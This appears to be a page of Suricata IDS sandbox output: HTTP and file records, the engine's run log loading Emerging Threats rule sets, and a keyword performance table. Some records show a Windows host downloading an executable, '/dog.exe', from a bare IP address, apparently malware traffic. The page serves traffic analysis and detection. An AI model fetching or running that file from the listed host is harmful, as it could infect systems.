{"timestamp":"2019-04-30T02:29:55.287976+0000","flow_id":509764083655729,"pcap_cnt":973,"event_type":"http","src_ip":"192.168.100.175","src_port":49192,"dest_ip":"188.166.74.218","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"188.166.74.218","url":"\/dog.exe","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"application\/x-msdos-program"}}
{"timestamp":"2019-04-30T02:29:57.198876+0000","flow_id":509764083655729,"pcap_cnt":979,"event_type":"fileinfo","src_ip":"188.166.74.218","src_port":80,"dest_ip":"192.168.100.175","dest_port":49192,"proto":"TCP","http":{"hostname":"188.166.74.218","url":"\/dog.exe","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"application\/x-msdos-program","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":672768},"app_proto":"http","fileinfo":{"filename":"\/dog.exe","gaps":false,"state":"CLOSED","stored":false,"size":672768,"tx_id":0}}
{"timestamp":"2019-04-30T02:30:49.924510+0000","flow_id":844479475001531,"event_type":"fileinfo","src_ip":"204.79.197.200","src_port":80,"dest_ip":"192.168.100.175","dest_port":49202,"proto":"TCP","http":{"hostname":"www.bing.com","url":"\/favicon.ico","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"image\/x-icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":237},"app_proto":"http","fileinfo":{"filename":"\/favicon.ico","gaps":false,"state":"CLOSED","stored":false,"size":237,"tx_id":0}}


suricata-report-2019-05-01-T-14-35-42-05012019.1435-a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap.txt - (17602 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/62429eda87eaf55ba4e1b45d7bcd1db956b33745cb75ec8c950e11a498e082d2 -r /var/pcap/05012019.1435-a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap -vvv -k none
elapsedtime:23.225461
stderr:
stdout:
1/5/2019 -- 14:35:19 - <Info> - Configuration node 'rule-files' redefined.
1/5/2019 -- 14:35:19 - <Notice> - This is Suricata version 4.0.0 RELEASE
1/5/2019 -- 14:35:19 - <Info> - CPUs/cores online: 1
1/5/2019 -- 14:35:19 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 31943 and 'request-body-inspect-window' set to 16689 after randomization.
1/5/2019 -- 14:35:19 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 32594 and 'response-body-inspect-window' set to 16252 after randomization.
1/5/2019 -- 14:35:19 - <Config> - DNS request flood protection level: 500
1/5/2019 -- 14:35:19 - <Config> - DNS per flow memcap (state-memcap): 524288
1/5/2019 -- 14:35:19 - <Config> - DNS global memcap: 16777216
1/5/2019 -- 14:35:19 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
1/5/2019 -- 14:35:19 - <Config> - preallocated 1000 hosts of size 136
1/5/2019 -- 14:35:19 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
1/5/2019 -- 14:35:19 - <Config> - using magic-file /usr/share/file/magic
1/5/2019 -- 14:35:19 - <Config> - Core dump size is unlimited.
1/5/2019 -- 14:35:19 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
1/5/2019 -- 14:35:19 - <Config> - preallocated 1000 defrag trackers of size 168
1/5/2019 -- 14:35:19 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
1/5/2019 -- 14:35:19 - <Config> - stream "prealloc-sessions": 2048 (per thread)
1/5/2019 -- 14:35:19 - <Config> - stream "memcap": 33554432
1/5/2019 -- 14:35:19 - <Config> - stream "midstream" session pickups: disabled
1/5/2019 -- 14:35:19 - <Config> - stream "async-oneside": disabled
1/5/2019 -- 14:35:19 - <Config> - stream "checksum-validation": disabled
1/5/2019 -- 14:35:19 - <Config> - stream."inline": disabled
1/5/2019 -- 14:35:19 - <Config> - stream "bypass": disabled
1/5/2019 -- 14:35:19 - <Config> - stream "max-synack-queued": 5
1/5/2019 -- 14:35:19 - <Config> - stream.reassembly "memcap": 134217728
1/5/2019 -- 14:35:19 - <Config> - stream.reassembly "depth": 0
1/5/2019 -- 14:35:19 - <Config> - stream.reassembly "toserver-chunk-size": 2640
1/5/2019 -- 14:35:19 - <Config> - stream.reassembly "toclient-chunk-size": 2605
1/5/2019 -- 14:35:19 - <Config> - stream.reassembly.raw: enabled
1/5/2019 -- 14:35:19 - <Config> - stream.reassembly "segment-prealloc": 2048
1/5/2019 -- 14:35:19 - <Config> - Delayed detect disabled
1/5/2019 -- 14:35:19 - <Config> - pattern matchers: MPM: ac, SPM: bm
1/5/2019 -- 14:35:19 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
1/5/2019 -- 14:35:19 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
1/5/2019 -- 14:35:19 - <Config> - prefilter engines: MPM
1/5/2019 -- 14:35:19 - <Config> - IP reputation disabled
1/5/2019 -- 14:35:19 - <Perf> - Registered 148 keyword profiling counters.
1/5/2019 -- 14:35:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
1/5/2019 -- 14:35:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
1/5/2019 -- 14:35:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
1/5/2019 -- 14:35:24 - <Config> - No rules loaded from ET-icmp.rules.
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
1/5/2019 -- 14:35:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
1/5/2019 -- 14:35:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
1/5/2019 -- 14:35:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
1/5/2019 -- 14:35:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
1/5/2019 -- 14:35:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
1/5/2019 -- 14:35:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
1/5/2019 -- 14:35:28 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
1/5/2019 -- 14:35:30 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
1/5/2019 -- 14:35:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
1/5/2019 -- 14:35:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
1/5/2019 -- 14:35:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
1/5/2019 -- 14:35:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
1/5/2019 -- 14:35:31 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
1/5/2019 -- 14:35:32 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
1/5/2019 -- 14:35:32 - <Config> - No rules loaded from local.rules.
1/5/2019 -- 14:35:32 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
1/5/2019 -- 14:35:32 - <Info> - Threshold config parsed: 0 rule(s) found
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for tcp-packet
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for tcp-stream
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for udp-packet
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for other-ip
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_uri
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_request_line
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_client_body
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_response_line
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_header
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_header
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_header_names
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_header_names
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_accept
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_accept_enc
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_accept_lang
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_referer
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_connection
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_content_len
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_content_len
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_content_type
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_content_type
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_protocol
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_protocol
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_start
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_start
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_raw_header
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_raw_header
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_method
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_cookie
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_cookie
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_raw_uri
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_user_agent
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_host
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_raw_host
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_stat_msg
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_stat_code
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for dns_query
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for tls_sni
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for tls_cert_issuer
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for tls_cert_subject
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for tls_cert_serial
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for dce_stub_data
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for dce_stub_data
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for ssh_protocol
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for ssh_protocol
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for ssh_software
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for ssh_software
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for file_data
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for file_data
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_request_line
1/5/2019 -- 14:35:33 - <Perf> - using shared mpm ctx' for http_response_line
1/5/2019 -- 14:35:33 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
1/5/2019 -- 14:35:33 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
1/5/2019 -- 14:35:33 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
1/5/2019 -- 14:35:33 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
1/5/2019 -- 14:35:33 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
1/5/2019 -- 14:35:33 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
1/5/2019 -- 14:35:33 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
1/5/2019 -- 14:35:33 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
1/5/2019 -- 14:35:38 - <Perf> - Unique rule groups: 104
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "toserver TCP packet": 35
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "toclient TCP packet": 17
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "toserver TCP stream": 33
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "toclient TCP stream": 19
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "toserver UDP packet": 27
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "toclient UDP packet": 17
1/5/2019 -- 14:35:38 - <Perf> - Builtin MPM "other IP packet": 3
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_uri": 14
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_request_line": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_client_body": 6
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient http_response_line": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_header": 10
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient http_header": 6
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_header_names": 2
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_accept": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_referer": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_content_len": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_content_type": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient http_content_type": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_protocol": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_start": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_raw_header": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient http_raw_header": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_method": 5
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_cookie": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient http_cookie": 2
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_raw_uri": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_user_agent": 6
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver http_host": 2
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient http_stat_code": 2
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver dns_query": 4
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver tls_sni": 2
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient tls_cert_issuer": 2
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient tls_cert_subject": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient tls_cert_serial": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver ssh_protocol": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toserver file_data": 1
1/5/2019 -- 14:35:38 - <Perf> - AppLayer MPM "toclient file_data": 7
1/5/2019 -- 14:35:40 - <Perf> - Registered 39590 rule profiling counters.
1/5/2019 -- 14:35:40 - <Info> - fast output device (regular) initialized: alert
1/5/2019 -- 14:35:40 - <Info> - eve-log output device (regular) initialized: eve.json
1/5/2019 -- 14:35:40 - <Config> - enabling 'eve-log' module 'alert'
1/5/2019 -- 14:35:40 - <Config> - enabling 'eve-log' module 'http'
1/5/2019 -- 14:35:40 - <Config> - enabling 'eve-log' module 'dns'
1/5/2019 -- 14:35:40 - <Config> - enabling 'eve-log' module 'tls'
1/5/2019 -- 14:35:40 - <Config> - enabling 'eve-log' module 'files'
1/5/2019 -- 14:35:40 - <Config> - enabling 'eve-log' module 'ssh'
1/5/2019 -- 14:35:40 - <Info> - Unified2-alert initialized: filename unified2.alert, limit 32 MB
1/5/2019 -- 14:35:40 - <Info> - stats output device (regular) initialized: stats.log
1/5/2019 -- 14:35:40 - <Config> - AutoFP mode using "Hash" flow load balancer
1/5/2019 -- 14:35:40 - <Info> - reading pcap file /var/pcap/05012019.1435-a02ab19f-2fe3-43b9-a4f2-6c4549ccee72.pcap
1/5/2019 -- 14:35:40 - <Config> - using 1 flow manager threads
1/5/2019 -- 14:35:40 - <Config> - using 1 flow recycler threads
1/5/2019 -- 14:35:40 - <Notice> - all 2 packet processing threads, 4 management threads initialized, engin

This file has been truncated. Go here to download in full.


keyword_perf.log - (15746 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
  --------------------------------------------------------------------------------------------------------------------------------
  Date: 5/1/2019 -- 14:35:42
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: total
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             9296095         2871            2871            385916          3237.00         3237.00         0.00           
  content          23434739        1687            537             499094          13891.00        19751.00        11154.00       
  pcre             21792486        123             18              20804320        177174.00       1161347.00      8459.00        
  byte_test        968476          289             81              32764           3351.00         3245.00         3392.00        
  byte_jump        126940          42              30              4803            3022.00         3042.00         2972.00        
  isdataat         5671            2               1               2838            2835.00         2838.00         2833.00        
  flowbits         4864145         1691            26              30669           2876.00         3320.00         2869.00        
  urilen           183892          57              13              4174            3226.00         3249.00         3219.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flow             9296095         2871            2871            385916          3237.00         3237.00         0.00           
  flowbits         4847463         1688            23              30669           2871.00         3028.00         2869.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: packet/stream payload
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          9179390         710             224             88818           12928.00        15835.00        11588.00       
  pcre             39186           3               1               26641           13062.00        8014.00         15586.00       
  byte_test        968476          289             81              32764           3351.00         3245.00         3392.00        
  byte_jump        108331          36              24              4803            3009.00         3027.00         2972.00        
  isdataat         5671            2               1               2838            2835.00         2838.00         2833.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         16682           3               3               7116            5560.00         5560.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          243345          62              36              7274            3924.00         3931.00         3915.00        
  pcre             20962943        29              4               20804320        722860.00       5204838.00      5743.00        
  urilen           183892          57              13              4174            3226.00         3249.00         3219.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_request_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          6997            2               2               4394            3498.00         3498.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7160            2               0               3701            3580.00         0.00            3580.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          13026702        691             129             499094          18851.00        48396.00        12070.00       
  pcre             279998          70              0               27243           3999.00         0.00            3999.00        
  byte_jump        18609           6               6               4118            3101.00         3101.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          569162          119             79              29546           4782.00         4896.00         4558.00        
  pcre             83362           14              8               10670           5954.00         5854.00         6088.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          127448          33              22              5096            3862.00         3899.00         3787.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3553            1               1               3553            3553.00         3553.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept_enc
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3065            1               1               3065            3065.00         3065.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_start
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3208            1               1               3208            3208.00         3208.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_raw_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          5112            1               0               5112            5112.00         0.00            5112.00        
  pcre             390459          1               0               390459          390459.00       0.00            390459.00      
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          27797           7               5               4544            3971.00         4063.00         3740.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          198570          47              28              17487           4224.00         4823.00         3343.00        
  pcre             19914           4               4               5260            4978.00         4978.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          22079           7               7               3478            3154.00         3154.00         0.00           
  pcre             16624           2               1               10144           8312.00         10144.00        6480.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_msg
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3140            1               0               3140            3140.00         0.00            3140.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
